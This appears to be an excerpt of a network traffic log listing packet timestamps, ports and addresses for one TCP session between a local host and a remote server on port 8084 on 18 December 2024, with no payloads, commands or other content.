Dec 18, 2024 13:32:02.806099892 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.817070961 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.817089081 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.817104101 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.817148924 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.819268942 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.819287062 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.819331884 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.821475983 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.821496964 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.821511984 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.821536064 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.821561098 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.823827028 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.823843956 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.823858976 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.823900938 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.825726032 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.825782061 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.883605957 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.884545088 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.884561062 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.884605885 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.885859966 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.885911942 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.886748075 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.886763096 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.886811972 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.889307022 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.889653921 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.889710903 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.890634060 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.892975092 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.893029928 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.893419981 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.894218922 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.894278049 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.894673109 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.895675898 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.895728111 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.896763086 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.897000074 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.897052050 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.897855043 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.898844004 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.898904085 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.902679920 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.903069019 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.903117895 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.903737068 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.904500961 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.904546976 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.904809952 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.905611992 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.905670881 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.909077883 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.909523010 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.909579992 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.910758018 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.969108105 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.004147053 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.006064892 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.006083012 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.006099939 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.006150007 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.006181002 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.008450031 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.008467913 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.008482933 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.008537054 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.010327101 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.010344028 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.010391951 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.015206099 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.015333891 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.015567064 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.016529083 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.016582966 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.037233114 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.037250996 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.037313938 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.039355040 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.092684031 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.092775106 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.093101978 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.093786955 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.093843937 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.094145060 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.094861031 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.094917059 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.095609903 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.096363068 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.096414089 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.096702099 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.097461939 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.097512007 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.100148916 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.100533009 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.100708008 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.100723028 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.101437092 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.101499081 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.106014013 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.106033087 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.106092930 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.107845068 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.109442949 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.109456062 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.109498024 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.111174107 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.111233950 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.117821932 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.117836952 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.117846966 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.117892981 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.122941971 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.122992039 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.124587059 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.124599934 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.124645948 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.126307964 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.126322031 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.126332998 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.126367092 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.127971888 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.127986908 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.128000021 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.128040075 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.130656958 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.204214096 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.204610109 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.204705000 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.205678940 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.206048965 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.206099987 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.207365036 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.208410025 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.208463907 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.214004040 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.214525938 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.214572906 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.215236902 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.231525898 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.231587887 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.231857061 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.232542038 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.232593060 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.244386911 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.244736910 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.244862080 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.245476007 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.286768913 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.310317993 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.310329914 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.310426950 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.312016964 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.312031031 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.312043905 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.312109947 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.313688040 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.313700914 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.313757896 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.315380096 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.315395117 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.315407038 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.315444946 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.315470934 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.317111969 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.317125082 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.317192078 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.317588091 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.318419933 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.318434000 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.318479061 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.319437027 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.319449902 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.319489956 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.320898056 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.320954084 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.321212053 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.321979046 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.321990967 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.322002888 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.322031975 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.322808981 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.323162079 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.323823929 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.323875904 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.324109077 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.324723005 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.324779034 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.328210115 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.328610897 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.328682899 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.329339027 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.331211090 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.331265926 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.331532001 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.332331896 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.332396984 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.339765072 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.339778900 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.339843988 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.341140985 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.383204937 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.420495033 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.420510054 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.420639992 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.421888113 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.421969891 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.422018051 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.423654079 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.423669100 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.423732042 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.426947117 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.427366972 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.427426100 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.428356886 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.443231106 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.443319082 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.443582058 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.444323063 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.444370031 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.458311081 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.458698034 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.458749056 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.459476948 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.507430077 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.521219969 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.521573067 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.521625042 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.522233009 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.522706985 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.522773981 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.523356915 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.524039030 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.524085999 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.524641991 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.525121927 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.525182009 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.525877953 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.529264927 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.529294014 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.529310942 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.530970097 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.531017065 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.535978079 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.535995007 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.536009073 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.536036015 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.542741060 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.542758942 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.542773962 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.542783022 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.542793036 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.542834044 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.547740936 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.547785997 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.549365044 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.551043034 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.551089048 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.554760933 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.556329012 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.556385040 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.557615042 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.560833931 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.560852051 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.560879946 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.562494993 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.562541962 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.569691896 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.569710016 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.569761992 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.571207047 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.574681997 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.574731112 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.576359987 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.577908039 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.577954054 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.587327957 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.588751078 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.588810921 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.590470076 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.633141041 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.633230925 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.633505106 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.634557962 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.634627104 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.634840965 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.635775089 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.635823011 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.636295080 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.640528917 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.640584946 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.640930891 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.641570091 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.641618013 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.657504082 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.657808065 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.657851934 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.658566952 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.672382116 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.672424078 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.672730923 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.673496962 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.673543930 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.749381065 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.751034975 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.751100063 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.752510071 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.754194975 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.754240036 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.755692959 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.755708933 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.755753994 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.760477066 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.760490894 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.760535002 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.762211084 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.766905069 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.766922951 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.767004967 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.768484116 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.768531084 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.773264885 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.773282051 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.773324013 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.774939060 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.774955034 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.775000095 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:03.776422977 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.776439905 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:03.776474953 CET	49705	8084	192.168.2.5	107.148.62.100
